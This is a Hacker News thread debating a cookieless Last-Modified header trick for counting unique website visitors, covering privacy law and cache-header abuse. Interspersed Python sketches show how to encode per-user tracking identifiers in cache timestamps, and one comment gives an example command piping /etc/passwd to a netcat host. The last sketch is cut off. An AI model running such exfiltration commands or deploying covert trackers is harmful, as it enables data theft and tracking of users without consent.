               | EGreg wrote:
               | Not only that. The ability to track your own visitors is
               | BUILT INTO how the web operates.
               | 
               | All a site has to do is include analytics in its server-
               | side library. And that's it. Doesn't even need CNAME
               | cloaking. It can send the analytics anywhere.
               | 
               | The thing ITP and others try to stop is tracking users
               | ACROSS sites.
               | 
               | But if you use single-sign-on with FB or any other
               | service, they can get your public photo, name and just
               | find you on Facebook thru some search engine that
               | spidered all profiles.
               | 
               | So if you really want to be anonymous, stop using the
               | single sign on and reusing passwords etc.
        
               | ohbtvz wrote:
               | But google analytics isn't viable. It's illegal to use in
               | the EU. Here's an explanation by, well, a viable
               | alternative to google analytics:
               | https://matomo.org/blog/2022/05/google-analytics-4-gdpr/
               | 
               | (I don't have a horse in this battle - my personal
               | website doesn't have analytics at all.)
        
               | stalfosknight wrote:
               | How about we just _stop_ tracking users and hoovering up
               | private data?
        
           | xapata wrote:
           | Who's "we"? I don't mind it. I want advertisers to give me
           | more relevant advertising.
        
             | mschuster91 wrote:
             | I don't want _any_ unsolicited advertising - and I wish our
             | societies would decide to outright _ban_ advertising:
             | Outdoor advertising is a nuisance for the eyes, radio and
             | TV advertising is annoying AF (particularly as it tends to
             | be mixed at a much greater loudness than the program
             | running, my conspiracy theory is that this is done so
             | people are forced to hear it when they go to the loo),
             | paper advertising (e.g. in newspapers, flyers or postal
             | spam) is a waste of paper and online advertising is an
             | insane danger for privacy and a vector for distribution of
             | malware.
             | 
             | Ideally, we'd have independent consumer protection
             | entities, either government or private (e.g. German
             | Stiftung Warentest), that would get products from companies
             | to rank and test, so consumers could make actually informed
             | decisions instead of being lured by hyped up advertising
             | claims.
        
             | dspillett wrote:
             | Depends how you define relevant. Since actively trying to
             | block stalky advertising behaviours I've had more
             | interesting adverts (by "interesting" I mean new-to-me, not
             | the "do you want another one of the thing you've already
             | bought all you need of for a while" types). Things are
             | relevant enough if, for instance, I get running related
             | adverts while reading an article about other runners or
             | browsing shoes.
             | 
             | In my experience the stalky behaviour doesn't improve the
             | advertising relevance from my PoV, so the fact it means
             | that all that derived information, some of it definitely
             | PII, is out there so should anyone be able to hack into it
             | they could use it for fraudulent purposes (identity theft,
             | spear-phishing my contacts, ...), makes the situation lose-
             | lose for me.
             | 
             | It is worse for other people, as they have information that
             | advertisers like to derive that might be extra sensitive.
             | Being white, male, cis, middle-class, etc., with a life not
             | interesting enough for there to be much to convincingly
             | blackmail or threaten me about, living in western Europe,
             | I'm pretty safe, but this can't be said for others
             | especially in certain parts of the world (scarily religious
             | ruled countries with bad records on individual rights, like
             | Qatar and America to give two examples).
        
               | xapata wrote:
               | I think you're conflating two different kinds of
               | surveillance. The article is incrementing a counter to
               | track the number of unique visitors.
               | 
               | If one is worried about blackmail or violence, especially
               | from a government, then one should take precautions
               | beyond complaining about the prevalence of browser
               | cookies. Modern life, carrying a mobile internet device
               | with GPS service, using a credit card, and going to
               | places with security cameras, presents a variety of
               | surveillance methods.
        
             | throwaway0x7E6 wrote:
             | we the normal people
        
           | lolinder wrote:
           | Counting is not the same as tracking. The technique proposed
           | would in most cases be useless for trying to _distinguish_
           | individuals, much less identify them. It's the computer
           | equivalent of the person standing out in front of Costco with
           | a clicker counter.
        
             | MereInterest wrote:
             | In principle, screen resolution would in most cases be
             | useless for trying to distinguish individuals. After all,
             | it wouldn't even distinguish the underlying hardware, let
             | alone a user of that hardware. But given omnipresent
             | tracking, it's one more bit that can be used to identify
             | you.
             | 
             | In addition, your comment shows a severe lack of
             | imagination. Suppose I'm a malicious server who wishes to
             | track users.
             | 
             | * For each new user, select a random "last-modified" date.
             | Now, I can clearly distinguish between multiple different
             | users, because "1985-01-01T00:00:10" is probably the 10th
             | visit from whoever was given "1985-01-01T00:00:00" on their
             | first visit.
             | 
             | * If I have too many users for the above approach to
             | uniquely identify a person, add more cached items. With
             | HTTP/2, both HTTP requests would use the same TCP
             | connection, so I can correlate the requests together.
             | 
             | And, bam. That goes from "useless for trying to distinguish
             | individuals, much less identify them" to a unique
             | identifier stored in the cache invalidation dates.
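
A minimal sketch of the first bullet above, to show how little it takes. It assumes a hypothetical scheme in which each new user is assigned their own minute after a fixed 1985 base date and every revalidation adds one second; the names EPOCH, first_visit_header, next_header and decode are invented here and do not come from the article.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Hypothetical base date; any date safely in the past would do.
EPOCH = datetime(1985, 1, 1, tzinfo=timezone.utc)


def first_visit_header(user_index: int) -> str:
    """Last-Modified value for a brand-new user: one distinct minute each."""
    return format_datetime(EPOCH + timedelta(minutes=user_index), usegmt=True)


def next_header(if_modified_since: str) -> str:
    """On a revalidation, bump the stored date by one second."""
    seen = parsedate_to_datetime(if_modified_since)
    return format_datetime(seen + timedelta(seconds=1), usegmt=True)


def decode(if_modified_since: str):
    """Recover (user_index, visit_count) from the date the browser sent."""
    seen = parsedate_to_datetime(if_modified_since)
    offset = int((seen - EPOCH).total_seconds())
    return divmod(offset, 60)


header = first_visit_header(7)
for _ in range(10):
    header = next_header(header)
```

After ten revalidations, decode(header) yields user 7 with 10 visits. One minute per user caps the count at 59 visits before it spills into the next user's slot; a real tracker would simply space the base dates further apart.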
        
               | lolinder wrote:
               | That is a different technique that uses the same medium
               | of storage. When I say "this technique" I'm referring to
               | specifically what was discussed in the article.
               | 
               | "Evil tracking companies will do evil things with any
               | protocol features you give them" is already well known
               | and there's not much to say about it that hasn't been
               | said. What OP is _actually_ doing is clever and new to
               | me.
        
               | MereInterest wrote:
               | I agree that it is clever, and it is new to me as well.
               | However, saying that an obvious extension to a technique
               | (posted by multiple people independently, no less) is a
               | different technique altogether and therefore not germane
               | is going a bit far.
               | 
               | If I post a privilege escalation exploit that allows me
               | to execute "cat /etc/sudoers", and somebody points out
               | that it could also be used to execute "cat /etc/passwd |
               | netcat malicious-remote-server.com", that's an obvious
               | extension of the same technique. This is the same, where
               | the same technique may be used for more intrusive attacks
               | than are performed in the initial proof of concept.
        
               | lolinder wrote:
               | This kind of attack isn't new, though, trackers have been
               | using side channel tracking forever now. A quick search
               | shows that this _exact_ side channel tracking
               | vulnerability was discussed in the year 2000 [0].
               | 
               | I'm not saying the technique isn't similar: I just object
               | to people dogpiling on OP because _other_ people can and
               | do abuse the same header in nefarious ways. It's not
               | constructive, just a pointless attack on someone who's
               | actually trying to improve privacy.
               | 
               | [0] http://www.sourcefrog.net/projects/meantime
        
             | ilyt wrote:
             | Kinda need one for the other if you want to distinguish
             | different users vs just one user clicking a lot.
             | 
             | You need some kind of identifier to differentiate between
             | different sessions, and the moment you generate that ID,
             | using whatever way, you are tracking user.
        
             | bawolff wrote:
             | Why would it be useless? Just pick a random date for each
             | user.
        
               | lolinder wrote:
               | I'm not talking about what you could theoretically do
               | with cache headers, I'm talking about what the author of
               | the article is actually doing.
        
               | bawolff wrote:
               | It's not like that is a far walk though. It's the exact
               | same technique, just storing different data.
               | 
               | Respectfully i feel like this would be like seeing an
               | example of css turning a page blue and claiming the
               | technique is useless for turning the page red because
               | that is not the specific example used.
        
               | lolinder wrote:
               | If a bunch of people got up in arms and started
               | complaining because the author of said CSS example hadn't
               | considered that their code could be changed slightly to
               | produce a hate symbol, I'd definitely still jump in and
               | say "but that's not what they were doing!"
        
             | SkyBelow wrote:
             | Counting is not tracking, but counting unique visitors
             | requires tracking to know they are unique. If the person
             | outside of Costco is counting unique visitors, they must be
             | tracking who has already visited and who has not. Even if
             | they aren't doing anything else with that information and
             | forgetting it each night, it is tracking. The existing
             | abuse of tracking has led to a level of backlash where any
             | tracking is seen through the worst possible lens.
        
               | jcuenod wrote:
               | It doesn't require tracking. Tracking would mean I could
               | tell that user x has returned n times. But I have no idea
               | who has returned, only that someone has returned n times.
               | 
               | The person standing outside Costco is counting people by
               | giving them a colored sticker when they walk through the
               | door. If they show up already having one, the counter
               | issues a different color. Who has the stickers is
               | unknown; only the number of stickers distributed in each
               | color is known.
               | 
               | As has been said, this is not to say the technique
               | couldn't be used for nefarious purposes. In this case,
               | it's not, though.
        
               | SkyBelow wrote:
               | That's still a form of tracking. Maybe not enough to
               | identify unique users in some use cases, but even just
               | knowing someone has been here n times is enough if the
               | user numbers are low enough that you can identify users
               | by unique n counts and patterns of n (such as if one user
               | is at 500 and another is at 490, if the second one is
               | logging in daily while the first one hasn't logged in for
               | a few months, and you see the 490 go 491, 492... when
               | they go from 499 to 500, chances are that when a 500 logs on
               | tomorrow and becomes 501, it was the 490 account that has
               | been logging in daily).
        
               | jcuenod wrote:
               | Must admit, I've never thought of "number of times I've
               | visited your site" as PII. Number of times I've visited
               | every site in my browser history, maybe, but not "number
               | of times I've visited this specific site". I'm thinking
               | about it, but I'm not immediately convinced.
        
               | [deleted]
        
       | layer8 wrote:
       | If this becomes widespread, browsers will probably start fudging
       | the timestamps.
        
       | glenjamin wrote:
       | I think the comments on this post would probably be less hostile if
       | the title said something like "detect the number of unique
       | visitors", which is what I believe it's doing, rather than
       | detecting unique visitors using unique timestamps, which is what
       | many seem to be guessing based on the headline alone.
        
         | andix wrote:
         | It would be interesting if it is also possible to abuse it. If
         | it is possible to create enough unique timestamps, that
         | browsers still accept them. Can you add milliseconds to the TS,
         | and do browsers store them too? Or do browsers also accept
         | timestamps from months or years back and re-send them? If you
         | can use the whole scale of Unix time (int32), there is a huge
         | pool of entropy available.
         | 
         | In this case they don't do this evil thing, and it probably
         | would still violate the European GDPR, even if it's not an
         | actual cookie, but somebody has to find it first.
        
           | kapep wrote:
           | Even without millisecond precision, you could embed multiple
           | assets that are served with slightly different timestamps to
           | encode a unique identifier.
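
A rough sketch of the multi-asset idea above, assuming whole-second precision and a hypothetical budget of 16 bits per cached asset. BASE, BITS_PER_ASSET and both function names are invented for illustration.

```python
from datetime import datetime, timedelta, timezone

BASE = datetime(2000, 1, 1, tzinfo=timezone.utc)  # hypothetical base date
BITS_PER_ASSET = 16  # 65536 distinct seconds, a little over 18 hours


def encode(identifier: int, assets: int):
    """Split an identifier into per-asset timestamps, low bits first."""
    stamps = []
    for _ in range(assets):
        identifier, chunk = divmod(identifier, 1 << BITS_PER_ASSET)
        stamps.append(BASE + timedelta(seconds=chunk))
    if identifier:
        raise ValueError("identifier does not fit in the given assets")
    return stamps


def decode(stamps) -> int:
    """Reassemble the identifier from the timestamps the browser echoes."""
    identifier = 0
    for position, stamp in enumerate(stamps):
        chunk = int((stamp - BASE).total_seconds())
        identifier |= chunk << (position * BITS_PER_ASSET)
    return identifier


stamps = encode(0xDEADBEEF, assets=2)
```

Two assets already carry 32 bits, and each extra asset adds 16 more, so sub-second precision is not needed for a unique identifier.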
        
         | tedunangst wrote:
         | Your personal visit count is embedded in the seconds.
        
           | lisper wrote:
           | Yes, but not your identity.
        
         | michaelbuckbee wrote:
         | They're using this to track number of unique visits from a
         | single user to a site.
        
           | Thorrez wrote:
           | Yes, but I think they're not tracking anything else about the
           | user besides number of visits. E.g. they're not tracking ip I
           | don't think.
           | 
           | And I think they are only doing it within a single day, not
           | across days.
           | 
           | If you know that someone exists who visited your site 500
           | times today, but know nothing else about the person, is that
           | a privacy problem?
        
       | rkagerer wrote:
       | ...at the cost of caching (or at least a round trip).
       | 
       | Is it necessary to know how many visits per day a particular user
       | made? If # of unique visitors per day/week/whatever is
       | sufficiently granular you could retain a corresponding cache
       | window.
       | 
       | Also if this is to avoid those cookie warnings that got popular
       | after GDPR, it should be noted you're still storing information
       | on users' computers. i.e. The stuffed metadata is not so
       | different in principle from a cookie. In this case it seems
       | innocuous, but I wouldn't be surprised to see sites exploit your
       | trick to store a unique last-modified date for each user as a
       | method of tracking (if that's not already commonplace).
        
         | not2b wrote:
         | The number of unique visits in a day is the number of total
         | visits minus the number of repeat visits from the same users,
         | so they need something like this to get an accurate count. You
         | can't produce the number without information on repeat
         | visitors.
         | 
         | I think you are right that this technique could be changed and
         | turned into a way to track individual users. But as
         | implemented, it doesn't do that, and all knowledge is lost
         | after one day. We shouldn't criticize people who are trying to
         | limit the information they collect to the bare minimum by
         | pointing out an altered version of their system might have
         | undesirable properties.
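
The arithmetic in the first paragraph above can be sketched as follows. This is a reconstruction from how commenters in this thread describe the scheme (visit count stored as seconds past midnight, reset daily), not the article's actual code; DailyCounter and its fields are hypothetical names.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


class DailyCounter:
    """Counts total and repeat requests for one day, keyed on nothing."""

    def __init__(self, midnight: datetime):
        self.midnight = midnight  # start of the current day, in UTC
        self.total = 0
        self.repeats = 0

    def handle(self, if_modified_since: Optional[str]) -> str:
        """Process one request and return the Last-Modified value to send."""
        self.total += 1
        visits = 0
        if if_modified_since:
            seen = parsedate_to_datetime(if_modified_since)
            if seen >= self.midnight:
                # The browser was already here today: count a repeat.
                visits = int((seen - self.midnight).total_seconds()) + 1
                self.repeats += 1
        stamp = self.midnight + timedelta(seconds=visits)
        return format_datetime(stamp, usegmt=True)

    @property
    def uniques(self) -> int:
        return self.total - self.repeats


counter = DailyCounter(datetime(2022, 11, 30, tzinfo=timezone.utc))
header = counter.handle(None)    # visitor A, first request
header = counter.handle(header)  # visitor A again
header = counter.handle(header)  # visitor A again
other = counter.handle(None)     # visitor B, first request
```

Four requests with two repeats give two unique visitors. A date from before midnight is treated as a new visitor, which is what discards yesterday's state.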
        
           | rkagerer wrote:
           | Then the server doesn't need to know about repeat-visits that
           | don't hit it, and it would be nice to maintain caching
           | support if the page content is static.
        
       | irq-1 wrote:
       | Change 'last-modified' to use a secure hash of the contents, like
       | sha256. Then the browser can detect if a website is giving bad
       | hashes, potentially using them for tracking.
        
         | sdfhbdf wrote:
         | That's what ETag is for.
         | 
         | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
        
           | irq-1 wrote:
           | ETags can be anything -- they aren't required to be a hash of
           | the content.
           | 
           | Thinking about this problem, why does the browser expose any
           | information about what's in the cache? Client-side JavaScript
           | can't tell what's in the cache because it's an obvious
           | security issue. Why let the server know?
           | 
           | Browsers should ask for the hashes on a list of content
           | without exposing their cache contents. Then the browser can
           | request anything that's changed.
        
             | jefftk wrote:
             | The way If-None-Match works is that the browser says "give me the
             | latest if this ETag represents an out-of-date resource,
             | otherwise I'll keep using my copy." It's not clear to me
             | how you're proposing this work instead?
             | 
             | (Also, in many cases the server uses a hash of the inputs
             | to generating the resource, which isn't something
             | externally verifiable)
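
A simplified sketch of the exchange described above, seen from the server side. The function names are illustrative, and splitting the header on commas is a shortcut that would break on an ETag containing a comma.

```python
from typing import Optional, Tuple


def opaque(tag: str) -> str:
    """Drop the weak-validator prefix; If-None-Match compares weakly."""
    tag = tag.strip()
    return tag[2:] if tag.startswith("W/") else tag


def respond(current_etag: str, body: bytes,
            if_none_match: Optional[str]) -> Tuple[int, bytes]:
    """Return (status, payload) for a GET that may be conditional."""
    if if_none_match is not None:
        candidates = [opaque(tag) for tag in if_none_match.split(",")]
        if "*" in candidates or opaque(current_etag) in candidates:
            # The client's copy is current: no body is sent.
            return 304, b""
    return 200, body
```

Whatever the server handed out as the ETag comes back verbatim in If-None-Match, which is why an arbitrary per-user value works as an identifier.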
        
           | jefftk wrote:
           | ETag doesn't have any assurance that it's a hash of the page
           | contents: the current protocol doesn't stop the server from
           | embedding arbitrary information in the ETag, and there's no
           | way for the client to tell.
        
             | debugnik wrote:
             | Neither does Last-Modified, as we just saw. If we were
             | going to alter the meaning of a header for this, it should
             | be ETag. Just agree on ETag formats that browsers can
             | verify are just hashes, and have them throw away any opaque
             | ETags or dates.
        
               | jefftk wrote:
               | You'd need to introduce something new for that. Many
               | servers compute ETags today as hashes of _inputs_ to a
               | process.
               | 
               | (Which is nice computationally, since you can immediately
               | say "not modified" instead of building the response,
               | hashing it, and throwing it away if the hash matches)
        
               | debugnik wrote:
               | Well, I said "just hashes" for short, but such ETag
               | formats could agree on other algorithms as well, as long
               | as the browser can verify them.
               | 
               | And introducing a new method doesn't solve the issue of
               | deprecating the existing abusable methods, which is why I
               | suggested one that can already be implemented by privacy-
               | first browsers one-sidedly. Servers would then be
               | pressured to migrate to some friendly ETag format if they
               | don't want to completely lose client-side caching for a
               | (hopefully growing) share of their userbase.
        
       | Isinlor wrote:
       | This is really no different than a cookie - basically the same
       | mechanism from the view of the server just different semantics.
        
         | geocar wrote:
         | Well, yes you could have a cookie with C=C+1 and carefully set
         | the expiration to the end of the day (like the article), or you
         | could use randomly generated last-modified times and
         | deduplicate server-side (similar to how cookies are usually
         | used), but I can think of a few reasons the cache would give
         | greater precision, so even if a lot of the same things are the
         | same, I'm not so sure it's really "no different"; these things
         | are pretty important to (some) publishers:
         | 
         | - third-party cookie blocking/notification features in browsers
         | 
         | - review processes on ad networks checking for actual cookies
         | rather than suspicious last-modified times
        
         | legitster wrote:
         | If anything, this is worse.
         | 
         | Cookies have built in browser behavior - they have limited
         | scope, the browser lets you see them, they get cleared out
         | regularly.
         | 
         | Abusing metadata is way sketchier.
        
           | eurasiantiger wrote:
           | Chances are they aren't the first to come up with something
           | like this. How can we detect this kind of metadata abuse?
        
             | fanso99 wrote:
             | perhaps randomize minutes/seconds of the "last-modified"
             | header.
        
               | notpushkin wrote:
               | Or perhaps just drop minutes/seconds. And maybe don't
               | store the date altogether for files that are small
               | enough?
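
A rough Python sketch of the "drop minutes/seconds" idea, as a client might apply it before echoing a stored date back in If-Modified-Since. The function name `coarsen_http_date` is hypothetical, and no browser is known to behave this way; this only illustrates the suggestion.

```python
from datetime import timezone
from email.utils import format_datetime, parsedate_to_datetime


def coarsen_http_date(value: str) -> str:
    """Round an HTTP date down to the hour, discarding minutes and seconds."""
    parsed = parsedate_to_datetime(value)
    if parsed.tzinfo is None:
        # Treat dates without a usable zone as UTC (an assumption).
        parsed = parsed.replace(tzinfo=timezone.utc)
    hourly = parsed.astimezone(timezone.utc).replace(minute=0, second=0, microsecond=0)
    return format_datetime(hourly, usegmt=True)
```

The trade-off is lost caching: an honest server whose resource really changed at 12:34:56 would see a request dated 12:00:00 and most likely resend the full body instead of answering 304.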
        
         | pornel wrote:
         | Important to note that privacy laws that regulate tracking are
         | not limited to the Cookie header. They apply to tracking and
         | data collection in general, regardless of how technically
         | clever you make it.
        
         | ape4 wrote:
         | Yes, cookies are a header field sent back by the browser and so
         | is this.
        
         | pavon wrote:
         | Exactly. They could have the same functionality and privacy
         | characteristics if they simply kept a cookie that incremented
         | each time the site was visited. The fact that they didn't go
         | this route suggests this is more about finding a way to track
         | unique visitors when cookies are disabled. They are
         | deliberately subverting the user's desire to not be tracked and
         | spinning it as a privacy win.
        
           | dahfizz wrote:
           | If it was about tracking users, wouldn't they generate a
           | unique timestamp per visitor on the first visit? Giving
           | everyone the same timestamp is a terrible way to try and
           | track individuals.
        
         | dvko wrote:
         | This is part of why I quit my privacy focused analytics start-
         | up years ago. I won't name it directly, but it was one of the
         | first and is still going strong (although not really open-
         | source anymore).
         | 
         | People kept asking for cookieless tracking but with another way
         | of identifying returning visitors that was always worse from a
         | privacy standpoint. Cookies can be controlled by the client,
         | anything stored on the server can not.
         | 
         | Honestly, cookies are pretty nice, it's the law around this
         | that sucks. Tricks that attempt to bypass the laws will surely
         | only work for a limited time, at least I hope they will...
        
       | yunruse wrote:
       | Hm, on Safari 16.1 it seems reloading twice clears the cache and
       | therefore the counter (but eg cmd-W cmd-Z cmd-R will safely
       | increase it). Either way, I think I would prefer this behaviour
       | to be some sort of cookie that the law okays, because as everyone
       | else has said, I'm quite sure browsers will fuzz these data.
       | 
       | (I would probably go for a Gaussian fuzzer each visit, just
       | because it adds the off chance that it's quite a way away from
       | any attempted ID, making it a little bit more difficult to cast a
       | wider net and get a few bits of entropy)
        
       | mikem170 wrote:
       | Their demo counter [0] didn't work in my browser, maybe because I
       | normally have javascript disabled.
       | 
       | In the demo it seems they have XMLHttpRequest code calling
       | ping.withcabin.com/cache for this trick of theirs.
       | 
       | Can this method of counting be made to work without javascript?
       | 
       | [0] https://lastmodified.normally.com/
        
       | zagrebian wrote:
       | > Many privacy-focused analytics services will generate and store
       | a UID on the server instead of saving it in a cookie - based on a
       | hash of your User Agent, IP, Location, Date etc.
       | 
       | What location? The Geolocation API?
       | 
       | What date? How can a date contribute to a UID? Each visitor sends
       | multiple HTTP requests at different dates.
        
       | notpushkin wrote:
       | If it's anonymous and doesn't collect any user data, why do we
       | need it at all? Would using a cookie for the same purpose (just a
       | counter of visits, resetting every day) trigger the GDPR laws
       | somehow? It would work in literally the same way except being
       | transparent to the user instead of utilizing some shady
       | technique.
        
       | zzo38computer wrote:
       | It should be able to detect that the date is not valid (and that
       | their precision is wrong), and avoid sending an "If-Modified-
       | Since" header. (The same would be true if they were assigned at
       | random rather than sequential like this; it still should be able
       | to detect that they are not valid and have wrong precision.)
        
       | [deleted]
        
       | birdmanjeremy wrote:
       | The demo doesn't work in safari on my mac. It sometimes gets to
       | 2, but on refresh goes back to 1. Actually, got it up to 4 one
       | time. Seems like the claims of "Works in any browser and any
       | server" are overstated.
        
         | devmunchies wrote:
         | same. I got it up to 8 by clicking into the address bar and
         | hitting enter. However, doing a refresh instead caused it to
         | reset (the browser didn't send the if-modified-since header so
         | the server didn't do its little trick and instead started
         | over)
        
       | alexmolas wrote:
       | What if during a day I visit the website more than 86400 times?
       | ;)
        
       | speedgoose wrote:
       | > This is great for privacy as we don't need to use cookies, IP
       | addresses, fingerprinting or unique identifiers. In our tests,
       | this method proved durable enough to be the most reliable method
       | of counting unique visitors without using cookies.
       | 
       | The differences with a cookie are that the header is named Last-
       | modified instead of Set-Cookie and Cookie, and the value must be
       | a datetime in the RFC2616 format.
       | 
       | How is it good for privacy? I think it's worse because it's
       | invisible for the user. I would bet tracking visitors using such
       | a hack isn't compatible with GDPR, which requires informed
       | consent for tracking. And good luck explaining your hack to the
       | average visitor.
        
         | Etheryte wrote:
         | You seem to slightly misunderstand how GDPR works. Tracking in
         | and of itself is not the problem, it's personal data and
         | personally identifying data that is. You can count how many
         | hits your server receives no problem, this is roughly the same
         | idea.
        
           | havkom wrote:
           | Basically the "cookie consent" part in the EU stems from the
           | e-privacy directive. Article 5.3 refers to GDPR (through the
           | directive that is replaced by GDPR) and reads:
           | 
           | Member States shall ensure that the storing of information,
           | or the gaining of access to information already stored, in
           | the terminal equipment of a subscriber or user is only
           | allowed on condition that the subscriber or user concerned
           | has given his or her consent, having been provided with clear
           | and comprehensive information, in accordance with Directive
           | 95/46/EC, inter alia, about the purposes of the processing.
           | This shall not prevent any technical storage or access for
           | the sole purpose of carrying out the transmission of a
           | communication over an electronic communications network, or
           | as strictly necessary in order for the provider of an
           | information society service explicitly requested by the
           | subscriber or user to provide the service.
           | 
           | In short, this method may fall under the EU "cookie law"
           | above. The use of timestamps may require consent if they are
           | used to distinguish users (even if only for counting
           | purposes). The timestamps may then also be personal data
           | under the GDPR.
        
           | luckylion wrote:
           | This is equivalent to setting a cookie with a hit count. It's
           | still storing & submitting information, it's just not using a
           | unique identifier (Which is pretty privacy-respecting, I'm
           | not saying it's a terrible thing or something).
           | 
           | I assume it will be treated as such, too. If you can use a
           | cookie to do this without consent, this is fine too. If you
           | can't then it's not. The same happens for local/session
           | storage: it's cookie-equivalent.
        
             | xyproto wrote:
             | The user with the highest visit count will always be
             | uniquely identifiable, though.
        
               | not2b wrote:
               | Only on the same day. Everything is reset the next day.
        
               | jiveturkey wrote:
               | I don't follow how this is a problem.
               | 
               | By that measure, any users behind a unique single IP (no
               | IP pooling, no CGNAT, etc) will always be uniquely
               | identifiable. And for IP there are far fewer steps to
               | personally identify the user. The server necessarily sees
               | the user IP.
        
               | speedgoose wrote:
               | Yes, the IP can be used to identify people. If you want
               | to track users using their IP and respect GDPR, you need
               | to get their consent first.
               | 
               | The best is to not store them before you get consent.
               | Having a temporary access log with a few IPs is probably
               | fine. But keeping all your access logs forever for
               | analytics purposes is not fine anymore.
        
           | speedgoose wrote:
           | I will quote the law:
           | 
           | > Natural persons may be associated with online identifiers
           | provided by their devices, applications, tools and protocols,
           | such as internet protocol addresses, cookie identifiers or
           | other identifiers such as radio frequency identification
           | tags. This may leave traces which, in particular when
           | combined with unique identifiers and other information
           | received by the servers, may be used to create profiles of
           | the natural persons and identify them.
        
       | jakobdabo wrote:
       | ETag (paired with If-None-Match header sent by the browsers) is
       | another caching header to be aware of.
       | 
       | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
        
         | doomrobo wrote:
         | Ooh that's kinda evil. A server could give a client a uniquely
         | identifying ETag for a given URL. So whenever the client comes
         | back on the same browser, they're identified.
         | 
         | Fortunately this is probably just as detectable as the Last-
         | Modified abuse in the post.
        
           | bawolff wrote:
           | There are a lot of things like that. Although browsers
           | changed it recently, you also used to be able to use TLS
           | session tickets.
           | 
           | Another one was the favicon cache.
           | 
           | Pretty much any state on the browser can be used to track
           | people.
        
       | mulhoon wrote:
       | Hi, author of the article here.
       | 
       | Just to give a little more background here.
       | 
       | Cabin doesn't store a row in a database for each visit. It only
       | stores one row, per day per domain. The attributes for that row
       | are simple tally counts - visits, uniques, bounces etc. So no
       | identifier is stored, and the hits go into the tally. We do not
       | store the fact that a user has visited x amount of times. The
       | demo here is to show how the technique works.
       | 
       | Cabin used to detect only the presence of _any_ last-modified
       | date to determine if the visit is unique or not. But extending it
       | to distinguish hits 1,2 and 3 (by adding 1 second to the start of
       | the day) now allows us to count the bounce rates too.
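
A minimal Python sketch of the counting scheme as described in the comment above. The exact encoding is an assumption: here the first hit of the day gets a Last-Modified equal to midnight UTC and each later hit adds one second. The function name `next_last_modified` is hypothetical and this is not Cabin's actual code.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple


def next_last_modified(if_modified_since: Optional[str], now: datetime) -> Tuple[int, str]:
    """Return (visit number today, Last-Modified value to send back)."""
    day_start = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0
    )
    previous_visits = 0
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            seen = None  # unparseable header: treat as a first visit
        if seen is not None and seen.tzinfo is not None:
            offset = int((seen - day_start).total_seconds())
            # Only stamps issued today count; older ones reset the tally.
            if 0 <= offset < 86_400:
                previous_visits = offset + 1
    visit_number = previous_visits + 1
    stamp = day_start + timedelta(seconds=visit_number - 1)
    return visit_number, format_datetime(stamp, usegmt=True)
```

Under these assumptions a request with no If-Modified-Since is a new unique visitor, and the seconds offset in the echoed date is the only per-client state.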
        
         | ohbtvz wrote:
         | Have lawyers familiar with EU law vetted your technique? Could
         | you share their legal reasoning? If not, why would anyone ever
         | take the risk to use your product and face huge fines?
        
           | senko wrote:
           | (Not OP)
           | 
           | I am all for privacy, use uBO, Firefox Focus / Incognito and
           | Google alternatives. But if I have to consult a lawyer each
           | time I write some code or write up a blog post, I'll take up
           | gardening instead.
        
             | jefftk wrote:
             | The OP is a "privacy-first web analytics" company; this is
             | totally something they should be asking their lawyers.
             | 
             | Note that they list the GDPR on their "Privacy law
             | compliance" page (https://docs.withcabin.com/privacy.html)
             | but not ePrivacy...
        
             | ohbtvz wrote:
             | No need for this kind of hyperbole. I wouldn't ask this
             | question if the OP's post didn't contain grandiose claims
             | such as "No cookies, no consent banners, no ad networks,
             | 100% GDPR & CCPA compliant, low footprint web analytics."
             | OP made a claim about their compliance with EU law. I'm
             | asking for proof or at least an explanation.
        
             | rcoveson wrote:
             | How about just consulting a lawyer each time you abuse a
             | protocol to get user's software to behave in a way that is
             | invisible to them and benefits you?
             | 
             | There is already a correct way to tell a browser to tell
             | the server something with each subsequent request: Cookies.
             | Nobody needs to "write some code" here; it's already
             | written. Working around the protocol isn't engineering,
             | it's just lying.
             | 
             | This blog post is just another cynical degradation of trust
             | between users and their browsers, and browsers and the
             | servers they talk to. Just another part of HTTP that we
             | can't use for what it was designed for anymore because
             | servers want so desperately to track visitors uniquely and
             | a significant subset of visitors would prefer not to be
             | remembered uniquely.
        
         | jefftk wrote:
         | Your landing page says "no cookies or consent banners" and
         | "compliant with all privacy laws", but the timestamp approach
         | stores data on a user's computer in a way that is not "strictly
         | necessary in order to provide an information society service
         | explicitly requested by the subscriber or user". Could you
         | explain how you see your approach as compliant with the
         | ePrivacy directive?
         | 
         | Full text: https://eur-lex.europa.eu/legal-
         | content/EN/TXT/HTML/?uri=CEL...
         | 
         | Guidance:
         | https://ec.europa.eu/justice/article-29/documentation/opinio...
        
           | IshKebab wrote:
           | Yeah this is just a cookie by another name. Probably already
           | used by supercookies.
           | 
           | The GDPR doesn't single out cookies so you can't get around
           | it by using a different storage device.
        
             | jefftk wrote:
             | _> The GDPR doesn't single out cookies so you can't get
             | around it by using a different storage device._
             | 
             | Quibble: this isn't a GDPR issue, it's an ePrivacy issue.
             | Two different regulations.
        
         | lolinder wrote:
         | Thanks for sharing!
         | 
         | I personally don't have an issue with it, but one thing that
         | might set some of the people here at ease is if you stopped
         | incrementing the timestamp after the second visit.
         | 
         | This would give you three possible states anyone could be in:
         | never visited, visited once, and visited more than once. It's
         | less data, but still enough to give you your bounce rate _and_
         | your total visits while minimizing the number of boxes you're
         | sorting individual visitors into.
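
A small Python sketch of the three-state variant suggested above, showing that it is still enough to maintain visits, uniques, and bounces. `DailyTally` and `record_hit` are hypothetical names, and treating a bounce as "a unique visitor with exactly one hit today" is an assumption about the metric.

```python
from dataclasses import dataclass


@dataclass
class DailyTally:
    visits: int = 0
    uniques: int = 0
    bounces: int = 0


def record_hit(tally: DailyTally, prior_state: int) -> int:
    """Update the tally and return the new client state.

    prior_state: 0 = never visited today, 1 = visited once, 2 = more than once.
    """
    tally.visits += 1
    if prior_state == 0:
        tally.uniques += 1
        tally.bounces += 1  # provisionally a bounce until a second hit arrives
        return 1
    if prior_state == 1:
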